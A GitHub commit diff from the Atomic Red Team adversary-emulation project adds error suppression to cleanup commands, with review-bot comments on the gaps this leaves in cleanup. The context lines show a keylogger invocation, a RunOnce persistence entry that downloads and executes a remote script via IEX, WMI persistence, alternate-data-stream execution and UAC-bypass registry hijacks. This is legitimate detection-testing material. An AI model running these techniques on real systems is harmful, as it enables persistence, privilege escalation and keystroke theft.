T1056_T1090_CleanupErrors (#844)

This commit is contained in:
tlor89
2020-02-28 13:47:42 -06:00
committed by GitHub
parent 5e8e3e0851
commit 52b99cd654
6 changed files with 7 additions and 7 deletions
+1 -1
@@ -22,4 +22,4 @@ atomic_tests:
Set-Location $PathToAtomicsFolder
.\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath}
cleanup_command: |
Remove-Item $env:TEMP\key.log
Remove-Item $env:TEMP\key.log -ErrorAction Ignore
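Review bot: The cleanup on L17 deletes a hard-coded `$env:TEMP\key.log`, while the test on L14 writes the log to the `#{filepath}` input argument, so a run with a non-default filepath leaves the keystroke log on disk and the new `-ErrorAction Ignore` then hides that nothing was removed. Using the same input in both places, `Remove-Item #{filepath} -ErrorAction Ignore`, keeps them in sync (assuming the argument's default is the TEMP path, which this hunk does not show). Note also that `Ignore` suppresses every error, not only the missing-file case, so a locked or access-denied file is skipped without any message; the same consideration applies to L33.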
+1 -1
@@ -53,4 +53,4 @@ atomic_tests:
$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
cleanup_command: |
Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force -ErrorAction Ignore
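Review bot: `$RunOnceKey` on L25 is assigned in the test's command block on L21, not in the cleanup block, so if the framework executes `cleanup_command` in a separate PowerShell session the variable is empty, `Remove-ItemProperty` fails, and the added `-ErrorAction Ignore` hides that failure while the RunOnce persistence entry stays on the host. The cleanup should not depend on state left by the test: `Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce" -Name "NextRun" -Force -ErrorAction Ignore`. Whether the two blocks share a session cannot be confirmed from this hunk, but the literal path is correct either way.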
+1 -1
@@ -40,4 +40,4 @@ atomic_tests:
command: |
Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip -DestinationPath $env:TEMP\Folder_to_zip.zip
cleanup_command: |
Remove-Item -Path $env:TEMP\Folder_to_zip.zip
Remove-Item -Path $env:TEMP\Folder_to_zip.zip -ErrorAction Ignore
+1 -1
@@ -40,7 +40,7 @@ atomic_tests:
cleanup_command: |
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
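Review bot: The `-ErrorAction SilentlyContinue` on L41 mainly masks the case where the consumer lookup on L38 returned nothing, because the interpolated query then degrades to `REFERENCES OF {}` and WMI rejects it; a genuine query failure is hidden in exactly the same way. Guarding the query instead tolerates a partially cleaned host while keeping real errors visible, e.g. `if ($EventConsumerToCleanup) { $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" }`. The hunk header announces seven lines but only six are rendered, so the tail of this cleanup block is not visible here.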
+1 -1
@@ -245,4 +245,4 @@ atomic_tests:
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
cleanup_command: |
Remove:Item #{ads_file}
Remove-Item #{ads_file} -Force -ErrorAction Ignore
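Review bot: `#{ads_file}` on L51 is passed to `Remove-Item` unquoted, as it is on L47, so an input value containing spaces is split into several arguments and the cleanup fails; with `-ErrorAction Ignore` that failure is silent and the alternate data stream stays on disk. Quoting the placeholder, `Remove-Item "#{ads_file}" -Force -ErrorAction Ignore`, avoids that. The test body this cleanup belongs to begins above L47.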
+2 -2
@@ -44,7 +44,7 @@ atomic_tests:
Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\eventvwr.msc"
cleanup_command: |
Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse
Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore
- name: Bypass UAC using Fodhelper
description: |
@@ -115,7 +115,7 @@ atomic_tests:
Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\ComputerDefaults.exe"
cleanup_command: |
Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse
Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore
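Review bot: With `-ErrorAction Ignore` on L59 and L67, a failed removal leaves the hijacked `shell\open\command` default value set on L55 / L63 in place with no indication to the operator, and that value is the UAC-bypass hook itself. A check after the removal, `if (Test-Path "HKCU:\software\classes\mscfile") { Write-Warning "mscfile key still present" }` (and the equivalent for `ms-settings` on L67), would make an incomplete cleanup visible without reintroducing noise when the key is already gone. The parameter casing `-force` also differs from the `-Force` used on L55 and L63; PowerShell accepts both, but one spelling per file reads better.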
- name: Bypass UAC by Mocking Trusted Directories
description: |